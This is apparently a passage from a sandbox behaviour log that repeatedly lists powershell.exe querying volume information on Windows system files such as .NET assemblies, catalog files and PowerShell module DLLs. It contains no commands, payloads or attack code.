        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
